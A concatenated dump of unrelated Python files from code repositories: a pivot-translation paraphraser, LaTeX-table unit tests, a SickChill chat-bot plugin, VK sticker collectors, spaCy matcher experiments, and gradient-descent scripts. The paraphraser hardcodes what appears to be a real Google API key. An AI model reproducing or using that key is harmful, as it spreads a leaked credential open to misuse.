cat.simulation.nlg import common\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass AbstractParaphraser(ABC):\n ESCAPE_SYM = '#'\n ESCAPE_PATTERN = re.compile(f'{ESCAPE_SYM}([a-zA-Z_]*)')\n\n def __init__(self, name):\n self.name = name\n\n def paraphrase_file(self, input_path: str, output_path: str, compute_bleu=True):\n out_data = []\n with open(input_path, mode='r', encoding='utf-8') as sents_file:\n for line in sents_file.readlines():\n sent = line.strip('\\n').strip()\n logger.info(f'Input: {sent}')\n paraphrased = self.paraphrase_sentence(sent=sent)\n logger.info(f'Output: {paraphrased}')\n bleu = sentence_bleu([self._sent_to_tokens(paraphrased)],\n self._sent_to_tokens(sent)) if compute_bleu else None\n out_data.append({'input': sent, 'output': paraphrased, 'bleu': bleu})\n with open(output_path, mode='w', encoding='utf-8') as out_file:\n json.dump(out_data, out_file, indent=2)\n\n def _sent_to_tokens(self, sent, split_sym=' '):\n return sent.split(split_sym)\n\n def _escape_placeholders(self, sent: str) -> str:\n placeholders = common.get_template_placeholders(sent)\n escaped_placedholders = dict([(placeholder, f'{self.ESCAPE_SYM}{placeholder}') for placeholder in placeholders])\n return sent.format(**escaped_placedholders)\n\n def _unescape_placeholders(self, original: str, escaped: str) -> str:\n unescaped = self.ESCAPE_PATTERN.sub(r'{\\1}', escaped)\n tokenized = self._sent_to_tokens(unescaped)\n for i, token in enumerate(tokenized):\n if re.findall('{(.+?)}', token):\n lower_placeholder = token.lower()\n tokenized[i] = lower_placeholder\n unescaped = ' '.join(tokenized)\n original_ph = common.get_template_placeholders(original)\n new_ph = common.get_template_placeholders(unescaped)\n unknown_placeholders = set(new_ph) - set(original_ph)\n if len(unknown_placeholders) > 0:\n logger.error(f'Unknown placeholders {unknown_placeholders}')\n return None\n for ph in original_ph:\n if f'{{{ph}}}' not in unescaped:\n logger.error(f'Missing placeholder {{{ph}}} in back translation {unescaped}')\n return None\n return unescaped\n\n @abstractmethod\n def paraphrase_sentence(self, sent: str):\n pass\n\n @abstractmethod\n def paraphrase_word(self, token: str):\n pass\n\n\nclass PPDBParaphraser(AbstractParaphraser):\n PPDB_RAW = 'ppdb'\n PPDB_JSON = 'ppdb.json'\n\n def __init__(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n json_path = os.path.join(current_path, self.PPDB_JSON)\n if not os.path.exists(json_path):\n self._preprocess()\n with open(json_path, 'r') as f:\n self.paraphrases = json.load(f)\n AbstractParaphraser.__init__(self, 'ppdb')\n\n def _preprocess(self):\n current_path = os.path.dirname(os.path.realpath(__file__))\n raw_path = os.path.join(current_path, self.PPDB_RAW)\n ppdb_dict = defaultdict(list)\n with open(raw_path, 'r') as pp_file:\n for line in pp_file:\n columns = line.strip().split(' ||| ')\n if len(columns) < 6:\n continue\n if columns[5] != 'Equivalence':\n continue\n word = columns[1]\n paraphrase = columns[2]\n if paraphrase not in ppdb_dict[word]:\n ppdb_dict[word].append(paraphrase)\n dump_path = os.path.join(current_path, self.PPDB_JSON)\n with open(self.PPDB_JSON, 'w') as out_file:\n json.dump(ppdb_dict, out_file, sort_keys=True)\n\n def paraphrase_sentence(self, sent: str):\n paraphrased = []\n for word in self._sent_to_tokens(sent):\n paraphrase = self.paraphrase_word(word)\n paraphrased.append(paraphrase)\n return ' '.join(paraphrased)\n\n def paraphrase_word(self, token: str):\n possibilities 
= self.paraphrases.get(token, [])\n if len(possibilities) == 0:\n return token\n return possibilities[0] # random.choice(possibilities)\n\n\nclass AbstractPivotParaphraser(AbstractParaphraser, ABC):\n def __init__(self, name):\n AbstractParaphraser.__init__(self, name)\n\n\nclass GooglePivotParaphraser(AbstractPivotParaphraser):\n URL = 'https://translation.googleapis.com/language/translate/v2'\n API_KEY = 'AIzaSyA2AhHSZ5qCf-aJEPXczK2n2lMpS3Amlis'\n\n def __init__(self, languages):\n self.languages = languages\n AbstractPivotParaphraser.__init__(self, 'google')\n\n def paraphrase_sentence(self, sent: str) -> str:\n translation = self._multi_translation(sent, self.languages)\n return translation\n\n def paraphrase_word(self, word: str) -> str:\n translation = self._multi_translation(word, self.languages)\n return translation\n\n def _multi_translation(self, text: str, languages=['en', 'de', 'fr', 'zh-CN', 'en']) -> str:\n if len(set(languages)) < 2:\n raise Exception('Need at least one intermediate language for pivot paraphrasing but got ' + languages)\n base = self._escape_placeholders(text)\n translation = base\n for i in range(len(languages) - 1):\n src_lang = languages[i]\n target_lang = languages[i + 1]\n translation = self._query_translation(text=translation, source=src_lang, target=target_lang)\n return self._unescape_placeholders(text, translation)\n\n def _query_translation(self, text: str, source: str = 'en', target='de') -> str:\n params = {'q': text, 'source': source, 'target': target, 'key': self.API_KEY}\n r = requests.post(url=self.URL, data=params)\n if r.status_code == 403:\n return self._query_translation(text, source, target)\n response = json.loads(htmlue(r.text))\n translations = response.get('data', {}).get('translations', [])\n return [translation.get('translatedText', text) for translation in translations][0]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-q', '--query', type=str,\n help='Input query to paraphrase. Can contain escaped characters in curly brackets')\n parser.add_argument('-i', '--in_file', type=str, help='Line separated list of queries')\n parser.add_argument('-o', '--out_file', type=str, help='Output file to write json to')\n parser.add_argument('-l', '--languages', type=str, nargs='*',\n help='The languages to use for pivot translation. First languages is appended as target automatically. Language abbreviations are not validated')\n parser.add_argument('-b', '--bleu', type=bool, default=True, help='Wether to compute and log the BLEU score')\n parser.add_argument('-p', '--paraphraser', default='g',\n help='Type of paraphraser. 
\"g\" for Google Translate API, \"p\" for PPDB paraphraser')\n args = parser.parse_args()\n\n query = args.query\n in_file = args.in_file\n if query and in_file:\n logger.error('Can either specify query or input file to paraphrase')\n exit(1)\n if not (query or in_file):\n logger.error('Must either specify query or input file to paraphrase')\n exit(1)\n if args.in_file and not args.out_file:\n logger.error(f'Missing argument \"-o\"/\"--out_file\" for file paraphrasation')\n exit(1)\n\n languages = []\n paraphrase_type = args.paraphraser\n if paraphrase_type == 'p':\n p = PPDBParaphraser()\n elif not paraphrase_type == 'g':\n logger.warning(f'Unknown paraphraser type \"{paraphrase_type}\", using default paraphraser \"g\"')\n paraphrase_type = 'g'\n if paraphrase_type == 'g':\n languages = args.languages\n if not languages or len(set(languages)) < 2:\n logger.error('At least two languages required for pivot paraphrasing')\n exit(1)\n if not languages[0] == languages[-1]:\n languages.append(languages[0])\n p = GooglePivotParaphraser(languages=languages)\n\n if query:\n logger.info(f'Input Sentence: {query}')\n paraphrase = p.paraphrase_sentence(query)\n logger.info(f'Output Sentence: {paraphrase}')\n else:\n p.paraphrase_file(input_path=in_file, output_path=args.out_file, compute_bleu=args.bleu)\n","repo_name":"DataManagementLab/CAT","sub_path":"cat/simulation/nlg/paraphrasing.py","file_name":"paraphrasing.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70640602727","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"Unit tests for pypytextable.\"\"\"\n\nimport pytest\n\nfrom pytextable import _pytextable\n\n\ndef test_wrap_tex_environment():\n text = \"My custom text\"\n expected = f\"\\\\begin{{center}}\\n {text}\\n\\\\end{{center}}\\n\"\n assert _pytextable._wrap_tex_environment(\"center\", text) == expected\n\n\ndef test_wrap_tex_environment_cmd():\n text = \"My custom text\"\n cmd = \"lll\"\n expected = f\"\\\\begin{{tabular}}{{{cmd}}}\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert _pytextable._wrap_tex_environment(\"tabular\", text, cmd=cmd) == expected\n\n\ndef test_wrap_tex_environment_options():\n text = \"My custom text\"\n options = \"lll\"\n expected = f\"\\\\begin{{tabular}}[{options}]\\n {text}\\n\\\\end{{tabular}}\\n\"\n assert (\n _pytextable._wrap_tex_environment(\"tabular\", text, options=options) == expected\n )\n\n\n@pytest.mark.parametrize(\"data\", [[[1, 2]], [[1, 2, 3]]])\ndef test_n_columns(data):\n assert len(data[0]) == _pytextable._get_num_columns(data)\n\n\ndef test_fail_columns():\n data = [\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3),\n (1, 2, 3, 4),\n ]\n with pytest.raises(ValueError, match=\"All rows must have the same number\"):\n _pytextable._get_num_columns(data)\n\n\n@pytest.mark.parametrize(\n \"alignment, n_columns, expected\",\n (\n (\"l\", 3, \"lll\"),\n (\"r\", 2, \"rr\"),\n (\"c\", 4, \"cccc\"),\n (\"l|\", 3, \"l|l|l\"),\n (\"|l|\", 3, \"|l|l|l|\"),\n (\"\", 3, \"ccc\"),\n (\"llc\", 3, \"llc\"),\n (\"|ll|l|\", 3, \"|ll|l|\"),\n ),\n)\ndef test_table_alignment(alignment, n_columns, expected):\n assert _pytextable._table_alignment(alignment, n_columns) == expected\n\n\ndef test_fail_table_alignment_chars():\n with pytest.raises(ValueError, match=\"Invalid alignment\"):\n _pytextable._table_alignment(\"llb\", 3)\n\n\ndef test_fail_table_alignment_n_separators():\n with pytest.raises(ValueError, match=\"Too many |\"):\n 
_pytextable._table_alignment(\"|l|||\", 3)\n\n\n@pytest.mark.parametrize(\"alignment\", (\"ll\", \"llll\"))\ndef test_fail_table_alignment_n_chars(alignment):\n with pytest.raises(ValueError, match=\"Number of alignment\"):\n _pytextable._table_alignment(alignment, 3)\n","repo_name":"karlch/pytextable","sub_path":"tests/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6641385426","text":"import requests\nimport json\nimport urllib\n\n\nclass sickChill(object):\n\n def __init__(self, couchURL, apikey, whitelistedusers):\n self.sickURL = couchURL\n self.apiKey = apikey\n self.users = whitelistedusers\n\n def begin(self, command, user):\n # make the command lower for all functions\n command = command.lower()\n response = None\n needs_help = False\n if user not in self.users:\n return \"This function is currently only avaliable to contributors to say thanks\"\n if 'tv today' in command:\n return self.getToday()\n elif 'tv latest' in command:\n return self.getLatest()\n elif 'tv search' in command:\n return self.getSearch(command.replace(\"tv search\", \"\"))\n elif 'tv download' in command:\n return self.getDownload(command.replace(\"tv download\", \"\"))\n elif command[-1] == '?':\n return \"No.\", False\n else:\n return \"Invalid Command\", False\n\n def getDownload(self, searchstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n download = sick.downloadTvShow(searchstr)\n if download == \"An existing indexerid already exists in database\":\n return \"Tv Show allready added\", False\n elif \"could not be parsed into\" in download:\n return \"Tv Show ID invalid, Full Error: \" + download, False\n elif \"queued to be added\" in download:\n return \"Success: \" + download + \"\\n *WARNING: This will only add future episodes, contact steve to add past episodes*\", False\n return download, False\n\n def getSearch(self, seachstr):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvshows = sick.searchTvShows(seachstr)\n if tvshows == \"Empty\":\n return \"No tvshows found\", False\n showlist = []\n for show in tvshows:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"name\"], \"value\": \"*First Aired:* \" + show[\"first_aired\"] + \"\\n*Allready added:* \" + show[\"in_show_list\"] + \"\\n*ShowID:* \" + str(show[\"id\"])})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getToday(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n if tvtoday == \"Empty\":\n return \"No shows airing today\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"blah\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n def getLatest(self):\n sick = sickChillAPI(self.sickURL, self.apiKey)\n tvtoday = sick.Today()\n tvlatest = sick.Latest()\n if tvtoday == \"Empty\":\n tvtoday = []\n if tvlatest == \"Empty\":\n tvlatest = []\n if len(tvlatest) == 0 & len(tvtoday) == 
0:\n return \"Now shows in the next 7 days\", False\n showlist = []\n for show in tvtoday:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Todays Shows\", \"fields\": fields})\n for show in tvlatest:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Next 7 days shows\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n\nclass sickChillAPI:\n\n def __init__(self, url, apikey):\n self.rooturl = url\n self.apikey = apikey\n\n def Today(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=today'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"today\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"today\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def Latest(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=soon'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"soon\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"soon\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def searchTvShows(self, search):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=sb.searchindexers&only_new=0&name=' + search\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"results\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"results\"]:\n ishow = {}\n ishow[\"first_aired\"] = show[\"first_aired\"]\n if show[\"in_show_list\"] is True:\n ishow[\"in_show_list\"] = \"Yes\"\n else:\n ishow[\"in_show_list\"] = \"No\"\n ishow[\"name\"] = show[\"name\"]\n ishow[\"id\"] = show[\"tvdbid\"]\n shows.append(ishow)\n return shows\n\n def downloadTvShow(self, id):\n url = self.rooturl + '/api/' + self.apikey + \"?cmd=show.addnew&indexerid=268592&status=ignored&tvdbid=\" + id\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return json_data[\"message\"]\n elif json_data[\"result\"] == \"success\":\n return json_data[\"message\"]\n","repo_name":"OneLogicalMyth/monkey-bot","sub_path":"plugins/sickPotatoBot.py","file_name":"sickPotatoBot.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6353681747","text":"import 
typing\n\nfrom sticker_parser.api import API\nfrom sticker_parser.models import StickerPack\n\n\nasync def get_section_sticker_packs(api: API, section_id: str, next_from: str = None) -> typing.List[dict]:\n packs = []\n data = api.send_api_request(\"catalog.getSection\", {\"section_id\": section_id, \"start_from\": next_from})\n if 'next_from' in data['response']['section'] and data['response']['section']['next_from']:\n packs += await get_section_sticker_packs(api, section_id, data['response']['section']['next_from'])\n return packs + list(map(lambda x: x[1], data['response']['stickers_packs'].items()))\n\n\nasync def get_all_sticker_packs(api: API) -> typing.List[dict]:\n packs = []\n sections = api.send_api_request(\"catalog.getStickers\", {\"need_blocks\": 0})\n for section in sections['response']['catalog']['sections']:\n packs += await get_section_sticker_packs(api, section['id'])\n\n unique_packs = []\n packs_ids = []\n\n for pack in packs:\n if pack['product']['id'] in packs_ids:\n continue\n packs_ids.append(pack['product']['id'])\n unique_packs.append(pack)\n return sorted(unique_packs, key=lambda x: x['product']['id'])\n\n\nasync def get_all_stickers(api: API, sticker_packs: typing.List[dict]) -> typing.List[dict]:\n keywords = api.send_api_request(\"store.getStickersKeywords\", {\n \"aliases\": 1,\n \"all_products\": 1,\n \"need_stickers\": 0\n })\n stickers = []\n for sticker_pack in sticker_packs:\n stickers += [\n {**sticker, \"product_id\": sticker_pack['product']['id']}\n for sticker in sticker_pack['product']['stickers']\n ]\n for dictionary in keywords['response']['dictionary']:\n for sticker in dictionary['stickers']:\n for index in range(len(stickers)):\n if stickers[index]['sticker_id'] == sticker['sticker_id']:\n stickers[index]['keywords'] = dictionary['words']\n break\n\n return stickers\n\n\nasync def collect_user_stickers(api: API, user_id: int) -> typing.List[dict]:\n gifts = api.send_api_request(\"gifts.getCatalog\", {\n \"no_inapp\": 0,\n \"user_id\": user_id,\n \"force_payment\": 1\n })\n stickers_gifts = [s for s in gifts['response'] if s['name'] in {'stickers_popular', 'stickers'}]\n stickers = []\n for sticker_gift in stickers_gifts:\n stickers += [item for item in sticker_gift['items'] if item.get('disabled', False)]\n stickers_ids = set([s['gift']['stickers_product_id'] for s in stickers])\n return [await sticker_pack.dict() async for sticker_pack in StickerPack.filter(id__in=stickers_ids)]\n\n\n\n","repo_name":"lordralinc/sticker_parser","sub_path":"sticker_parser/collectors.py","file_name":"collectors.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23897705727","text":"#pip means preffered installer programmer\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nworksheet.write('A1','Hello')\r\nworksheet.write('A2','welcome')\r\nworksheet.write('A3','xlsxwriter')\r\nworksheet.write('A4','module')\r\nworkbook.close()\r\n\r\nprint(\"^^^^^^^^^^^^^^\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=['Gana' ,\"Vikas\", 'Anant']\r\nfor i in l:\r\n worksheet.write(r,c,i)\r\n r +=1\r\nworkbook.close()\r\nprint(\"&&&&&&&\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=[['Gana',30000] ,[\"Vikas\",29000], 
['Anant',30000]]\r\nfor i in l:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\n r +=1\r\n c=0\r\nworkbook.close()\r\n\r\nprint(\"%%%%%%%%\")\r\n\r\n\r\n\r\n'''import sqlite3\r\nconn=sqlite3.connect('example.db')\r\nname=input(\"Enter name:\")\r\ncursor=conn.cursor()\r\n\r\n\r\ntry:\r\n cursor.execute(\"INSERT INTO employee (name) VALUES (?)\",(name, ))\r\n conn.commit()\r\n print(\"'%d' record inserted\" %(cursor.rowcount))\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()'''\r\n\r\n\r\nimport sqlite3\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('demo1.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Data\")\r\nconn=sqlite3.connect('example.db')\r\ncursor=conn.cursor()\r\nr=c=0\r\n\r\ntry:\r\n cursor.execute(\"\"\"select * from employee\"\"\")\r\n d=cursor.fetchall()\r\n for i in d:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"day 29 last day.py","file_name":"day 29 last day.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75297901928","text":"import os\nimport pickle\n\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nimport src.utils as utils\n\n\nclass Estimator:\n def __init__(\n self, src_dir, dst_dir,\n est_file, cls_file, drs_file, srs_file, input_size):\n self.src_dir = src_dir\n self.dst_dir = dst_dir\n self.est_file = est_file\n self.cls_file = cls_file\n self.drs_file = drs_file\n self.srs_file = srs_file\n self.input_size = input_size\n\n def execute(self):\n estimator = load_model(self.est_file)\n\n with open(self.cls_file, 'rb') as f:\n cls_info = pickle.load(f)\n\n pred_labels, true_labels, output = [], [], []\n\n for subdir in os.listdir(self.src_dir):\n for f in os.listdir(os.path.join(self.src_dir, subdir)):\n filename = os.path.join(self.src_dir, subdir, f)\n img = utils.load_target_image(filename, self.input_size)\n pred_class = np.argmax(estimator.predict(img))\n pred_label = cls_info[pred_class]\n pred_labels.append(pred_label)\n\n true_label = subdir\n true_labels.append(true_label)\n\n output.append(f'{filename} -> {pred_label}')\n\n report = classification_report(true_labels, pred_labels)\n labels = list(cls_info.values())\n cnfmtx = confusion_matrix(true_labels, pred_labels, labels)\n cm = pd.DataFrame(cnfmtx, index=labels, columns=labels)\n\n utils.mkdir(self.dst_dir, rm=True)\n with open(self.drs_file, 'w') as f:\n f.writelines(output)\n\n with open(self.srs_file, 'w') as f:\n f.write(report)\n f.write('¥n¥n')\n f.write(str(cm))\n f.write('¥n')\n","repo_name":"fyk7/keras_image_cookiecutter","sub_path":"src/models/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7923364042","text":"import spacy \nfrom spacy.matcher import Matcher\nimport json\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nmatcher = Matcher(nlp.vocab)\npattern = [\n {\"LIKE_EMAIL\":True}\n]\nmatcher.add(\"EMAIL_ADDRESS\", [pattern])\n\ndoc = nlp(\"Thsi is email address : abc@winner.com\")\nmatches = matcher(doc)\n# print(matches)\n\n# matches[0][0] is a lexeme\n# print(f'Label = {nlp.vocab[matches[0][0]].text}')\n\nwith open 
(\"data\\wiki_mlk.txt\", \"r\") as f:\n text = f.read()\n\n#grabing all proper noun followed with verb\nmatcher2 = Matcher(nlp.vocab)\npattern2 = [\n {\"POS\":\"PROPN\", \"OP\":\"+\"}, {\"POS\":'VERB'}\n # {\"IS_ALPHA\": True}, {\"IS_DIGIT\": True, \"OP\": \"+\"}\n]\nmatcher2.add(\"PROPER_NOUNS\",[pattern2], greedy='LONGEST')\ndoc2 = nlp(text)\nmatches2 = matcher2(doc2)\n# print(len(matches2))\nmatches2.sort(key=lambda x : x[1])\n# for match in matches2[:10]:\n# print(match, doc2[match[1]:match[2]])\n\n\n\n#grabbing speaker name who said the quote\n\nwith open(\"data/alice.json\",'r') as f:\n # for json file replace \\ -> / тнР\n data = json.load(f)\ntext3 = data[0][2][0]\ntext3 = text3.replace(\"`\",\"'\")\nprint(text3)\n\nspeak_lemmas = [\"think\", \"say\", \"tell\"]\n\nmatcher3 = Matcher(nlp.vocab)\npattern3 = [\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"},\n {\"POS\":'VERB', \"LEMMA\":{'IN': speak_lemmas}},\n {\"POS\":\"PROPN\", \"OP\":\"+\"},\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"}\n]\npattern4 = [{'ORTH': \"'\"},\n {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"}, {'ORTH': \"'\"},\n {\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {\"POS\": \"PROPN\", \"OP\": \"+\"}\n ]\npattern5 = [{\"POS\": \"PROPN\", \"OP\": \"+\"},\n{\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {'ORTH': \"'\"}, {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"},\n {'ORTH': \"'\"}\n ]\nmatcher3.add(\"PROPER_NOUNS\",[pattern3, pattern4, pattern5], greedy='LONGEST')\ndoc3 = nlp(text3)\nmatches3 = matcher3(doc3)\nprint(len(matches3))\nmatches3.sort(key=lambda x : x[1])\nfor match in matches3[:10]:\n print(match, doc3[match[1]:match[2]])","repo_name":"jigarsiddhpura/NLPwithSpacy","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10745994553","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\ndef grad_w(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx) * x\r\n\r\ndef grad_b(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx)\r\n\r\ndef loss(w,b):\r\n\terror = 0\r\n\tfor x,y in zip(X,Y):\r\n\t\tfx = f(w,b,x)\r\n\t\terror += 0.5 * (fx - y) ** 2\r\n\t\treturn error\r\n\r\n\r\nfilename = 'data.csv'\r\ndf = pd.read_csv(filename)\r\nX = df ['x']\r\nY = df ['y']\r\n\r\ninit_w,init_b=1,1\r\nw_b_dw_db = [(init_w,init_b,0,0)]\r\nw_history,b_history,error_history,losshistory=[],[],[],[]\r\nw,b,eta,mini_batch_size,num_points_seen = init_w,init_b,0.01,10,0 \r\nm_w,m_b,v_w,v_b,eps,beta1,beta2,max_epochs=0,0,0,0,1e-8,0.9,0.99,1000\r\n\r\nfor i in range (max_epochs):\r\n\tdw,db = 0,0\r\n\tfor x,y in zip(X,Y):\r\n\t\tdw+= grad_w(w,b,x,y)\r\n\t\tdb+= grad_b(w,b,x,y)\r\n\t\t\r\n\tm_w = beta1 * m_w + (1 - beta1) * dw\r\n\tm_b = beta1 * m_b + (1 - beta1) * db\r\n\t\t\r\n\tv_w = beta2 * v_w + (1 - beta2) * dw ** 2\r\n\tv_b = beta2 * v_b + (1 - beta2) * db ** 2\r\n\t\t\r\n\tm_w_hat = m_w / (1 - math.pow(beta1,i+1))\r\n\tm_b_hat = m_b / (1 - math.pow(beta1,i+1))\r\n\t\t\r\n\tv_w_hat = v_w / (1 - math.pow(beta2,i+1))\r\n\tv_b_hat = v_b / (1 - math.pow(beta2,i+1))\r\n\t\t\r\n\tw = w - (eta / np.sqrt(v_w_hat + 
eps))* m_w_hat\r\n\tb = b - (eta / np.sqrt(v_b_hat + eps)) * m_b_hat \r\n\tr = loss(w,b)\r\n\tprint (r)\r\n\tlosshistory.append(r)\r\n\tplt.plot(losshistory)\r\n\t\r\nplt.show()\r\n\r\n\t\t\r\n\t\t\t\r\n\r\n\t\r\n\r\n\r\n\t\r\n\r\n\t\r\n","repo_name":"princeamitlali/gradient_descent","sub_path":"adamgradientdescent.py","file_name":"adamgradientdescent.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15034551158","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef extend_matrix(X):\n return np.c_[np.ones((X.shape[0], 1)), X]\n\ndef normal_eq(Xe, y):\n return np.linalg.inv(Xe.T.dot(Xe)).dot(Xe.T).dot(y)\n\ndef normalize(x_to_norm, X):\n return (x_to_norm - np.mean(X, axis=0, dtype=np.float64)) / np.std(X, axis=0, dtype=np.float64)\n\ndef cost(Xe, y, beta):\n j = np.dot(Xe, beta)-y\n return (j.T.dot(j))/Xe.shape[0]\n\n# def gradient_descent(X, y, a = 0.0002, n = 20000000):\ndef gradient_descent(X, y, a = 0.01, n = 1000, plot = False):\n \"\"\"Perform gradient descent on the given X\"\"\"\n w = np.zeros(X.shape[1])\n costs = []\n for i in range(n):\n j = (X.T).dot(X.dot(w) - y)\n w = w - (a * j) / X.shape[0]\n costs.append(cost(X, y, w))\n if plot:\n plt.figure()\n plt.plot(range(n), costs)\n return w\n\n\ndef main():\n data = np.loadtxt(\"A2_datasets_2022/girls_height.csv\")\n\n X = data[:, 1:3]\n y = data[:, 0]\n\n plt.figure(\"Girl, mom\")\n plt.scatter(X[:, 0], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n plt.xlabel(\"mom height\")\n plt.ylabel(\"girl height\")\n\n plt.figure(\"Girl, dad\")\n plt.xlabel(\"dad height\")\n plt.ylabel(\"girl height\")\n plt.scatter(X[:, 1], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n\n Xe = extend_matrix(X)\n beta = normal_eq(Xe, y)\n\n print(beta)\n print(cost(Xe, y, beta))\n ug1 = [1, 65, 70]\n\n 